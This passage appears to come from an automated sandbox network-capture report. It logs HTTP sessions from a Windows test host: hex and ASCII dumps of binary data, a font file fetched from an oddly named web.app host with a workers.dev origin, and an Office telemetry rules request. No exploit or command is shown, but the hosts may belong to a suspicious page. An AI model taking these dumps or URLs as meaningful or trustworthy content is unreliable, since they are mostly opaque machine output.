                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 18 0e 84 e6 cb 41 33 1b 77 59 2d ba ab eb aa c7 9a 39 a9 bb 45 6b 71 54 df 4d 44 59 15 e6 7a 33 22 d7 31 44 76 76 5f 9e 8c 9d 5d 4f 6b 15 d3 c1 e9 5b a1 83 3f 32 b7 d5 52 73 52 a9 f4 c7 96 f6 7e 7a 35 5c b0 06 ed 2a 42 53 cd e3 45 d3 67 5b 22 ca 45 96 52 f7 25 a8 99 30 49 3b 1a db 64 19 85 f4 0f 42 25 75 ea 4c 87 35 35 5e 65 a4 74 d3 9a 96 b2 33 f4 f7 b8 6d 32 62 df a1 cc 1c 5d a7 5e 95 b6 52 ed 78 68 07 7c cf 6d 3c ca 21 6a aa 23 76 fd c4 e6 e4 e8 d9 a1 12 71 ef e8 d5 21 1c 70 8d 19 5b 88 0f b7 02 7b 6a 7c fd da 49 27 a1 a1 08 54 e7 71 2a 0d 1b f4 63 26 5c 8b f2 5d 36 c5 5c ec b3 33 a2 db 2c 07 67 49 f4 51 57 2f 22 f5 34 cf 2f 56 3a ba 0b 9f 2d 59 90 67 2c b5 ab d3 d1 79 8d ad cc e6 f4 f4 bd d8 38 f4 76 76 c5 71 74 6e b3 99 02 39 9f 5b d7 8b 9a 66 4a c7
                                                                                                                                                                                                                                                                                Data Ascii: A3wY-9EkqTMDYz3"1Dvv_]Ok[?2RsR~z5\*BSEg["ER%0I;dB%uL55^et3m2b]^Rxh|m<!j#vq!p[{j|I'Tq*c&\]6\3,gIQW/"4/V:-Yg,y8vvqtn9[fJ
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 25 39 eb a4 61 84 96 d5 75 b6 cb e1 e5 ea 31 b7 a1 e9 d8 00 7c fc eb f5 74 72 b8 84 37 77 a0 eb 9d f8 18 48 92 40 05 92 40 20 01 ba f7 da 55 04 2a 9a 25 9a 5e 5b 5d 19 93 06 3e b7 17 5e 75 7b df ab ce aa 5e cb f3 72 36 68 a5 da 86 a7 4a 7a 2b a5 86 60 a6 0b da 80 bb 19 32 05 58 56 61 2d 83 3e 7a e8 47 91 88 43 7e c1 d3 8e bd 29 e9 6c 79 89 09 3c 03 77 fa 55 f9 dc c2 ea ec eb b7 35 9c fe 01 13 0c 00 0a 30 00 40 01 d4 e8 cd 68 29 7d c8 a4 c9 27 42 8a a3 1f 23 b1 ca ea e1 be 68 bb af 93 9d a6 13 42 71 6d e8 c5 65 74 bd c7 57 74 b0 f3 25 41 6c a5 4e 25 23 3c b4 53 45 79 dc 89 4a e8 a3 39 60 4e ba f2 1b 75 cd 3c cd 3d 1e 8d ae cd 33 20 7c f7 47 a1 d3 83 80 29 af af b9 06 f2 95 00 12 00 2c 92 00 10 04 6e eb bd 48 2c 3f 54 54 88 55 3a 0b 52 f0 a8 ec f3 7a 9c fb
                                                                                                                                                                                                                                                                                Data Ascii: %9au1|tr7wH@@ U*%^[]>^u{^r6hJz+`2XVa->zGC~)ly<wU50@h)}'B#hBqmetWt%AlN%#<SEyJ9`Nu<=3 |G),nH,?TTU:Rz
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: af d9 62 34 69 74 33 0d 0a ef 9f 3b 68 6a ae 94 7b d1 b9 c6 bd 91 35 67 bc ab 9d 6d 89 9b 8d 00 ae d7 3d 96 65 a8 00 24 d7 75 0e 17 df b1 e6 95 99 4a 6b 54 48 45 70 25 60 aa 5f 5e cb e9 08 09 24 90 24 08 00 0a 57 2b 6c b3 2e f0 90 68 ac 9b 00 9f 1d 13 b2 aa ac bf 71 b5 d2 f6 86 a0 79 81 e8 a1 ee 94 76 4b 1e ac 5a 74 c1 61 15 e4 d6 99 eb b6 9a 38 cd 35 a3 3e 9b ed b7 9b 9c 09 02 5b 7a 00 db cd b2 b9 aa 80 b2 aa ab 42 54 02 03 9b da ba 9b b5 a2 80 48 48 12 00 00 19 d3 6f 01 3a b6 5d 6c 92 0d 15 92 e1 27 8a 79 95 ba 6e b5 7a 56 e5 80 d2 ee cf 0e f4 50 5a 57 50 db 27 0d fa 5d 69 b1 e6 33 e7 d5 5e 2a 28 32 a2 a1 64 df d0 b7 9b 94 00 24 26 ed a8 03 9d 29 c9 53 b5 84 aa 40 95 24 44 c9 06 9c 39 36 ea d6 c4 00 49 20 12 00 00 b8 8d d8 b0 68 db 7d c0 48 d1 50 ce 04
                                                                                                                                                                                                                                                                                Data Ascii: b4it3;hj{5gm=e$uJkTHEp%`_^$$W+l.hqyvKZta85>[zBTHHo:]l'ynzVPZWP']i3^*(2d$&)S@$D96I h}HP
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 21 20 16 c9 2b 4e 2e 46 43 3f 47 aa a5 f5 5a fc fe 8c 53 b2 ba 56 e7 4b 7c ee 2b de 61 df ac 99 3a b6 26 da 33 69 1a 33 6c e2 03 f5 a8 db 9a c4 be bc fa 98 64 c9 48 55 4a 45 e0 88 6f b3 ce 97 a6 9d 3c de f6 80 09 24 60 11 2a 49 7c 0d 9f 28 a7 7d 19 14 db cb b5 ed 70 16 9c fc 10 6d 5d 2b b4 66 d2 04 90 4c 93 00 a8 bc 8c 06 7e 9e eb 65 74 6c c0 ed cd e8 68 cf 97 6d b6 a2 79 9c ba 1e 67 55 1d 1b b0 f4 9c b4 4b 51 74 e1 db c7 1d 7a e8 16 66 d2 fc fb ee 4b 73 e1 b6 b6 ae 84 4a d5 b4 91 b1 b3 f3 86 af 4e 8e a8 c4 00 0e d3 15 23 a0 b5 d4 ed ce c8 7a 7c f2 95 8f 7f 32 24 84 54 a1 72 a8 d7 f5 ed 7c d7 80 00 12 04 52 f7 72 39 e5 1b f5 68 bf 22 5f ba de 63 e9 bf 2e 6e 99 75 56 79 8c 5a 4b 9b 7e 3d fa 79 5d 3b 52 f1 07 1e 82 ac b6 c7 43 2d 53 a6 2d 65 91 0e 6b df 49
                                                                                                                                                                                                                                                                                Data Ascii: ! +N.FC?GZSVK|+a:&3i3ldHUJEo<$`*I|(}pm]+fL~etlhmygUKQtzfKsJN#z|2$Tr|Rr9h"_c.nuVyZK~=y];RC-S-ekI
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 46 64 21 9e c7 69 4c d9 6b 2c 61 ce a5 a9 43 6f 6c ba b8 dc c9 8b 2d 70 56 44 34 5d 9a 6e b5 f1 6b 33 d9 6d 14 b7 43 99 66 cc d4 d9 59 a3 a1 5d ba 69 a7 36 87 7c 7c fd fa 75 22 e3 c5 9a d4 50 50 00 82 00 1f 46 ec d9 52 a6 a8 f4 3a 88 88 85 14 88 d2 2a 42 89 09 2a b3 65 f6 bc 81 10 aa b4 d2 95 c2 03 5f 7d b6 dd e5 08 70 13 bb 6d 38 ef 35 a6 9a 78 d4 ab cc 01 22 c6 9b b2 5b 3a 8c db 72 23 df 45 16 6f e6 3e ba 8a 48 7d ef 19 33 d9 af 55 b6 a6 3d 3c 75 1f 4e 14 52 24 58 09 01 60 2c ec eb ab 96 91 45 71 59 dd d4 0a 10 12 96 58 29 08 a2 40 4c 3b 5a ec 04 24 25 75 54 88 b1 25 b7 5a f7 dd e4 5e 19 44 d1 d6 d3 ce cb 93 5e fb f7 d1 cc 26 2b cd 4c ca ca 9a 1a 87 4e 9e 78 d3 9a 9b 2f 4c 7a b5 f3 27 75 13 5d d7 15 51 1b f7 da 4b 3b 2e 0e 34 17 5f 80 09 15 48 00 80 83
                                                                                                                                                                                                                                                                                Data Ascii: Fd!iLk,aCol-pVD4]nk3mCfY]i6||u"PPFR:*B*e_}pm85x"[:r#Eo>H}3U=<uNR$X`,EqYX)@L;Z$%uT%Z^D^&+LNx/Lz'u]QK;.4_H
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 0a cb 76 66 a0 bc 12 8b ee 98 8a 37 8d 9a f8 c1 4a 1a d2 9c 80 c7 69 39 e4 bc c4 dd 7e 1c da 76 be 65 50 68 52 49 99 0b 1a 48 22 45 14 05 20 00 50 52 08 00 20 ec 68 91 98 73 4b 91 26 28 da c0 b4 54 fa 2c 90 16 2b ce 0c 42 d5 55 75 a6 0c 91 a7 a5 bf 4d be 46 e3 a5 86 97 b4 2b 6d 0b 25 06 9b 1a 72 6c c5 88 e9 6c e4 e4 c6 4c bf 7f 9d 52 3c ca 3b 6b a7 9e fa f5 d1 94 1a 54 59 24 69 2d 99 00 61 45 22 22 08 08 20 14 88 02 02 23 b3 a5 c2 e2 22 db 1e 65 97 35 72 03 de f2 01 02 e7 50 02 56 9c e2 ae 6c 59 a0 b3 44 5f 66 ac 55 bd d3 34 69 b5 09 c3 66 8b 8b 39 bb 39 9d 4b 25 f9 58 32 83 5f d6 c4 aa 38 8e 69 b7 9b 55 fb 27 30 33 d8 eb 09 52 81 63 48 0d 20 b1 02 8a 10 41 00 a4 28 41 00 76 f4 cc d8 e9 0d 32 5f 64 cc 11 0c 41 00 04 44 21 09 20 0b 55 02 24 67 c9 45 6b d2
                                                                                                                                                                                                                                                                                Data Ascii: vf7Ji9~vePhRIH"E PR hsK&(T,+BUuMF+m%rllLR<;kTY$i-aE"" #"e5rPVlYD_fU4if99K%X2_8iU'03RcH A(Av2_dAD! U$gEk
                                                                                                                                                                                                                                                                                2024-10-06 14:41:56 UTC1378INData Raw: 5a cb 3d 35 cd 26 b9 e3 5e 96 13 a5 2b 9c 49 6e fa 0c e5 61 33 91 b5 dc 08 cc e9 a0 26 75 39 f4 c4 48 6b 58 48 99 bd 35 9a ad e3 4c 09 1b d6 ec c0 59 22 49 d2 36 a3 2c 3a d0 33 9d cc 74 b9 ce 22 6f 58 24 ab d2 67 1a 5d 24 4b 52 4b d3 52 21 66 66 77 56 4b b5 49 98 de e1 34 cc d8 18 e5 75 58 86 90 dc a4 69 9c 96 98 8e 89 6d b3 9c 0d 58 6b 55 33 22 ea 6a 35 45 41 cd ba c7 34 b7 2d e6 da a5 ae 31 a5 5a 26 37 72 cc 4b d2 64 2e ad cc 20 ae 94 02 50 c7 32 4b 45 28 33 96 ad 6e 84 e5 2c 0e 94 c4 b2 8a 65 54 e9 40 00 9c a3 35 65 4b 56 0c c5 d2 f4 04 f3 c6 f5 6d 29 9c 03 46 69 75 6d 00 00 ce 32 25 4a a2 cc 8b 6e ea 24 e7 32 bb d6 8b 19 ca 2b 44 95 77 40 50 08 b1 18 c9 2a 85 18 b6 ea cb 18 92 49 75 bd 12 64 ab bc a5 83 58 d5 b4 05 20 40 99 ce 75 6c 15 58 9b 28 65 99
                                                                                                                                                                                                                                                                                Data Ascii: Z=5&^+Ina3&u9HkXH5LY"I6,:3t"oX$g]$KRKR!ffwVKI4uXimXkU3"j5EA4-1Z&7rKd. P2KE(3n,eT@5eKVm)Fium2%Jn$2+Dw@P*IudX @ulX(e


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                39192.168.2.649774199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC617OUTGET /db46390fdb0d15d3d3561232b69daf608858cdd1.ttf HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://chattts-49f1.beszyrecala.workers.dev
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                Referer: https://kengegame.web.app/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 30740
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: font/ttf
                                                                                                                                                                                                                                                                                Etag: "f3f91823252888f30d87b2ab17fab4c9654ec24bb6fc27b34fd77f9f52671603"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740049-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225717.384784,VS0,VE2
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 00 01 00 00 00 0f 00 80 00 03 00 70 44 53 49 47 00 00 00 01 00 00 78 0c 00 00 00 08 46 46 54 4d 60 05 61 7c 00 00 77 d0 00 00 00 1c 47 44 45 46 00 29 01 01 00 00 77 ec 00 00 00 1e 4f 53 2f 32 16 a4 2c 41 00 00 01 78 00 00 00 60 63 6d 61 70 e5 5b a3 c5 00 00 05 c8 00 00 02 5a 67 61 73 70 00 00 00 10 00 00 77 c8 00 00 00 08 67 6c 79 66 88 ae ca f8 00 00 0a 28 00 00 62 64 68 65 61 64 f9 37 50 46 00 00 00 fc 00 00 00 36 68 68 65 61 07 45 03 e0 00 00 01 34 00 00 00 24 68 6d 74 78 f8 17 2d a0 00 00 01 d8 00 00 03 f0 6c 6f 63 61 ae 85 96 04 00 00 08 2c 00 00 01 fa 6d 61 78 70 01 45 00 5c 00 00 01 58 00 00 00 20 6e 61 6d 65 27 a6 d5 19 00 00 6c 8c 00 00 08 e2 70 6f 73 74 25 2e 2a 5b 00 00 75 70 00 00 02 56 70 72 65 70 68 06 8c 85 00 00 08 24 00 00 00 07 00 01 00
                                                                                                                                                                                                                                                                                Data Ascii: pDSIGxFFTM`a|wGDEF)wOS/2,Ax`cmap[Zgaspwglyf(bdhead7PF6hheaE4$hmtx-loca,maxpE\X name'lpost%.*[upVpreph$
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 00 40 01 2c 00 2e 01 2c 00 36 01 08 ff b4 02 58 00 00 03 04 00 1e 02 db 00 29 02 ee 00 00 02 11 ff ff 02 ee 00 00 02 11 00 00 02 02 00 28 02 c4 00 22 02 ee 00 18 02 51 00 17 02 30 00 26 02 6a 00 24 03 14 00 31 01 74 00 0e 02 23 00 4f 02 30 00 30 02 36 00 30 02 36 00 30 02 2e 00 37 02 33 00 30 02 4f 00 30 00 00 00 03 00 00 00 03 00 00 00 1c 00 01 00 00 00 00 01 54 00 03 00 01 00 00 00 1c 00 04 01 38 00 00 00 4a 00 40 00 05 00 0a 00 7e 00 ff 01 31 01 42 01 53 01 61 01 78 01 7e 01 92 02 c7 02 dd 03 c0 20 14 20 1a 20 1e 20 22 20 26 20 30 20 3a 20 44 20 ac 21 22 21 26 21 93 22 02 22 06 22 0f 22 12 22 1a 22 1e 22 2b 22 48 22 60 22 65 25 ca fb 02 ff ff 00 00 00 20 00 a0 01 31 01 41 01 52 01 60 01 78 01 7d 01 92 02 c6 02 d8 03 c0 20 13 20 18 20 1c 20 20 20 26 20
                                                                                                                                                                                                                                                                                Data Ascii: @,.,6X)("Q0&j$1t#O006060.730O0T8J@~1BSax~ " & 0 : D !"!&!"""""""+"H"`"e% 1AR`x} &
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 02 ae 00 42 00 46 00 00 37 22 35 35 34 33 33 37 23 22 35 35 34 33 33 37 36 37 36 33 33 32 15 07 33 37 36 37 36 33 33 32 15 07 33 32 15 15 14 23 23 07 33 32 15 15 14 23 23 07 06 06 23 23 22 35 37 23 07 06 07 06 23 23 22 35 37 37 33 37 23 21 14 14 5b 1a 51 14 14 5e 1f 01 03 08 20 04 1c 21 77 1e 01 03 08 20 05 1c 1f 44 14 14 53 19 4c 14 14 5c 1f 03 10 18 04 1c 20 76 20 02 02 07 20 04 1c 20 5a 76 1a 76 c4 1e 11 1e 93 1e 11 1e a7 08 04 0a 0f ae a7 08 04 0a 0f ae 1e 11 1e 93 1e 11 1e b0 0c 0a 11 b5 b0 08 04 0a 11 b5 4d 93 00 00 00 03 00 23 ff b9 01 d0 02 f6 00 2d 00 33 00 39 00 00 37 34 36 33 32 16 16 17 11 2e 02 27 26 34 36 37 35 34 32 15 15 16 16 15 14 06 22 27 26 27 15 16 16 17 16 14 06 07 15 14 22 35 35 26 26 12 06 14 16 17 35 12 36 34 26 27 15 23 1b 08 03
                                                                                                                                                                                                                                                                                Data Ascii: BF7"554337#"5543376763323767633232##32####"57###"57737#![Q^ !w DSL\ v ZvvM#-3974632.'&467542"'&'"55&&564&'#
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 1b 1e 22 1f 05 33 0c 09 fd 9f 1e 0c 1e 00 00 01 00 33 00 00 01 d9 02 c2 00 20 00 00 32 26 34 37 36 12 36 34 26 22 06 06 22 26 35 34 36 33 32 16 15 14 06 06 07 07 21 32 15 15 14 23 21 3f 0c 04 2b e0 3b 43 62 43 26 0c 19 7f 35 62 73 25 4d 73 49 01 20 14 14 fe 82 1c 1d 04 36 01 17 5a 5e 38 1a 19 27 0b 1d 2c 5b 4f 32 53 66 8d 59 1e 0b 1e 00 00 00 01 00 2d ff fa 01 d5 02 c2 00 31 00 00 37 34 36 33 32 16 32 36 36 35 34 26 23 23 22 35 35 34 33 33 32 36 34 26 23 22 07 06 23 22 26 35 34 36 33 32 16 15 14 06 07 15 16 16 14 06 07 06 22 26 2d 1a 09 01 68 57 3d 31 4d 49 21 14 14 1d 45 40 36 41 47 33 11 05 08 19 7e 35 5c 6e 3b 2c 32 4c 29 22 42 a5 76 33 0e 24 23 16 41 33 48 3c 1e 0b 1e 54 54 3b 18 09 28 0c 15 20 5a 57 31 48 11 04 0d 62 80 54 18 2e 25 00 00 02 00 12 ff
                                                                                                                                                                                                                                                                                Data Ascii: "33 2&47664&""&54632!2#!?+;CbC&5bs%MsI 6Z^8',[O2SfY-17463226654&##"55433264&#"#"&54632"&-hW=1MI!E@6AG3~5\n;,2L)"Bv3$#A3H<TT;( ZW1HbT.%
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 32 36 35 34 26 23 22 06 15 14 16 33 32 36 33 32 15 14 06 23 22 26 25 14 33 32 36 37 36 37 26 23 22 54 01 04 be 97 b6 76 5c 2d 34 02 31 56 30 2d 18 1c 74 5f 40 2f 09 05 06 0f 06 16 21 28 38 57 9a 7d a7 e5 96 7a 3a 5d 03 0e 71 37 91 b5 01 0b 58 22 46 19 0d 06 29 33 90 ed c5 01 0f b2 fe e3 bc 30 23 07 5a 24 12 4c 34 77 96 2f 1c 07 09 15 fe cc 18 2a a5 6c 7f 9a f6 b2 8e b1 1d 17 1a 18 c9 a6 7e 42 4b 86 13 22 00 02 00 0c ff fe 02 59 02 be 00 17 00 1c 00 00 37 34 37 13 36 33 33 32 17 13 16 15 14 23 23 22 27 27 21 07 06 23 23 22 13 33 03 27 07 0c 03 ed 05 23 1d 23 05 ed 03 2b 08 23 05 3b fe da 39 05 23 05 2b ad ef 69 0d 10 0f 05 09 02 91 10 10 fd 6e 07 06 11 10 a4 a4 10 01 00 01 2a 3a 3a 00 00 00 03 00 61 00 00 02 30 02 bc 00 14 00 1c 00 24 00 00 37 11 34 33 33
                                                                                                                                                                                                                                                                                Data Ascii: 2654&#"32632#"&%326767&#"Tv\-41V0-t_@/!(8W}z:]q7X"F)30#Z$L4w/*l~BK"Y7476332##"''!##"3'##+#;9#+in*::a0$7433
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 36 35 34 26 23 23 55 1e cb 4d 41 25 2c 23 31 20 31 30 9b 28 08 28 58 9c 26 25 14 1a 50 37 8e 14 02 8a 1e 22 13 53 70 4f 2a 0d 14 fe ea 16 01 78 18 0d 37 26 43 35 00 02 00 39 ff 6c 02 ac 02 c2 00 12 00 1a 00 00 13 34 36 20 16 15 14 06 07 15 17 16 14 06 23 22 24 27 26 36 16 32 36 10 26 22 06 39 9e 01 2d 9e 67 62 c5 0e 1b 0f 08 fe ac 30 bd 5b 71 d1 71 72 d0 71 01 5b b0 b7 b8 af 8e ae 1a 04 3e 05 18 3a 86 14 4b 82 90 91 01 0f 93 92 00 00 00 02 00 61 ff fe 02 50 02 bc 00 1f 00 27 00 00 37 11 34 33 33 32 16 15 14 07 15 16 16 17 17 16 15 14 23 23 22 27 27 26 26 23 23 11 14 23 23 22 13 33 32 36 34 26 23 23 61 1e a8 78 79 73 1d 27 16 4e 03 2a 0a 22 06 4c 16 42 3d 5a 28 08 28 58 84 35 4b 48 3f 7d 14 02 8a 1e 55 5c 7b 2e 04 0a 3a 39 c5 09 05 10 10 c4 39 29 fe e0 16
                                                                                                                                                                                                                                                                                Data Ascii: 654&##UMA%,#1 10((X&%P7"SpO*x7&C59l46 #"$'&626&"9-gb0[qqrq[>:KaP'74332##"''&&####"3264&##axys'N*"LB=Z((X5KH?}U\{.:99)
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 23 22 26 34 36 36 07 14 33 32 36 37 35 22 07 06 07 06 01 7d 6e 48 3d 15 02 0a 19 75 a4 68 05 07 26 15 08 07 04 04 03 03 01 44 64 4d 5e 6d 88 9b 55 31 47 25 7d 24 13 15 29 01 46 2f 54 1f 0b 28 0a 15 2b 53 4a e0 3c 1b 25 02 0c 0b 04 0a 09 10 09 13 03 4b 4c 9e 4f 11 af 52 24 21 76 0e 07 0b 15 00 00 00 00 02 00 55 ff fa 02 03 02 f0 00 15 00 20 00 00 37 11 34 33 33 32 15 15 36 32 16 15 15 14 06 22 27 07 06 23 23 22 37 16 33 32 35 34 26 27 23 22 07 55 28 04 28 42 a8 70 69 b0 48 10 05 16 04 1e 54 3f 42 81 43 40 06 43 36 14 02 c6 16 16 fc 33 8b 7b 09 74 94 4b 3b 0c 8a 45 ca 59 60 01 2d 00 00 01 00 34 ff fa 01 c7 02 11 00 23 00 00 13 34 36 37 36 33 32 16 15 14 06 23 22 26 26 27 26 23 22 15 14 16 33 32 37 36 36 33 32 16 15 14 06 23 22 26 34 29 23 42 5f 3a 5c 17 09
                                                                                                                                                                                                                                                                                Data Ascii: #"&46632675"}nH=uh&DdM^mU1G%}$)F/T(+SJ<%KLOR$!vU 7433262"'##"73254&'#"U((BpiHT?BC@C63{tK;EY`-4#467632#"&&'&#"3276632#"&4)#B_:\
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 26 23 22 07 11 14 23 23 22 56 05 07 26 15 08 07 04 04 03 03 01 43 a5 57 28 04 28 35 31 48 36 28 04 28 14 01 5f 3d 1a 24 03 0c 0b 04 09 09 0f 09 11 03 4b 56 4c fe a5 16 16 01 53 2e 33 46 fe 92 16 00 00 02 00 37 ff fa 02 02 02 11 00 07 00 0f 00 00 16 26 10 36 32 16 10 06 26 32 36 34 26 22 06 14 ae 77 78 de 75 73 bc 92 46 46 92 44 06 88 01 03 8c 8b fe fb 87 48 5f c8 60 5f c9 00 00 02 00 4a ff 30 02 04 02 11 00 1d 00 27 00 00 17 14 23 23 22 35 11 34 27 26 35 34 36 32 1e 05 17 36 32 16 15 15 14 06 22 27 37 33 36 36 34 26 22 07 11 16 aa 28 04 28 05 07 26 15 08 07 04 04 03 03 01 48 b0 69 70 a8 42 79 06 40 43 40 83 3f 36 ba 16 16 02 2d 3d 1a 24 03 0c 0b 04 09 09 0f 09 11 03 4b 94 74 09 7b 8b 33 17 01 60 ba 69 45 fe ee 2d 00 00 02 00 34 ff 30 01 e2 02 11 00 15 00
                                                                                                                                                                                                                                                                                Data Ascii: &#"##"V&CW((51H6((_=$KVLS.3F7&62&264&"wxusFFDH_`_J0'##"54'&546262"'73664&"((&HipBy@C@?6-=$Kt{3`iE-40
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 26 35 35 34 26 23 23 22 35 35 34 33 33 32 16 15 15 14 16 16 15 15 14 06 06 15 15 14 06 23 23 22 35 35 34 32 16 14 0e 23 1f 0c 4e 0e 14 16 14 14 32 1c 32 14 38 38 14 32 1c 32 14 4c 1e 20 af 2e 49 1c 06 37 64 b0 20 1d 1d 04 1d 35 3f a7 38 3b 19 17 0e 17 19 3c 37 a7 40 34 1d 04 1d 00 00 00 00 01 00 4f 00 d7 01 d4 01 3b 00 11 00 00 36 26 35 34 36 32 16 32 36 32 16 15 14 06 22 26 22 06 5d 0e 50 57 6c 26 2a 10 12 50 58 6b 26 2a e6 1a 07 11 23 1a 0b 12 0e 12 23 1a 0b 00 00 02 00 52 ff 4d 00 c1 02 0d 00 0b 00 17 00 00 13 22 35 35 34 33 33 32 15 15 14 23 07 33 32 15 11 14 23 23 22 35 13 36 88 28 28 11 28 28 0d 0b 1e 28 14 27 1b 02 01 9f 16 42 16 16 42 16 5e 16 fe 38 16 16 01 c8 16 00 00 02 00 37 ff b5 01 c2 02 47 00 26 00 2c 00 00 13 34 36 37 36 37 35 34 32 15 15
                                                                                                                                                                                                                                                                                Data Ascii: &554&##"554332##"5542#N228822L .I7d 5?8;<7@4O;6&5462262"&"]PWl&*PXk&*##RM"554332#32##"56((((('BB^87G&,46767542
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC1378INData Raw: 15 19 08 6f 6f 08 18 16 0b 82 b9 0d 82 0b 15 19 08 6f 6f 08 18 16 0b 82 f6 18 10 9c 0c 14 15 0b 90 91 0b 12 17 0d 9c 10 18 10 9c 0c 14 15 0b 90 91 0b 12 17 0d 9c 00 01 00 26 00 4d 02 0a 01 52 00 0f 00 00 13 22 35 35 34 33 21 32 15 15 14 23 23 22 35 35 3a 14 14 01 b2 1e 1e 0d 1e 01 09 1e 0d 1e 1e d1 16 16 a6 00 00 00 00 01 00 2c 00 e6 01 11 01 2c 00 0b 00 00 37 22 35 35 34 33 33 32 15 15 14 23 40 14 14 bd 14 14 e6 1e 0a 1e 1e 0a 1e 00 00 04 00 0a ff fb 02 d9 02 c6 00 07 00 0f 00 2e 00 36 00 00 36 10 36 20 16 10 06 20 12 06 10 16 20 36 10 26 03 11 34 33 33 32 15 14 07 15 16 16 17 17 16 15 14 23 23 22 27 27 26 26 23 23 15 14 23 23 22 37 33 32 36 35 34 23 23 0a d1 01 2c d2 d3 fe d6 14 b6 b7 01 01 b7 b7 f9 12 63 8e 44 11 16 0e 2e 02 19 06 13 04 2d 0d 27 24 35
                                                                                                                                                                                                                                                                                Data Ascii: oooo&MR"5543!2##"55:,,7"554332#@.666 6&4332##"''&&####"732654##,cD.-'$5


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                40192.168.2.64977313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:57 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:57 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 428
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                x-ms-request-id: 6be05283-001e-00a2-2700-17d4d5000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144157Z-1657d5bbd482krtfgrg72dfbtn00000001rg00000000nspp
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
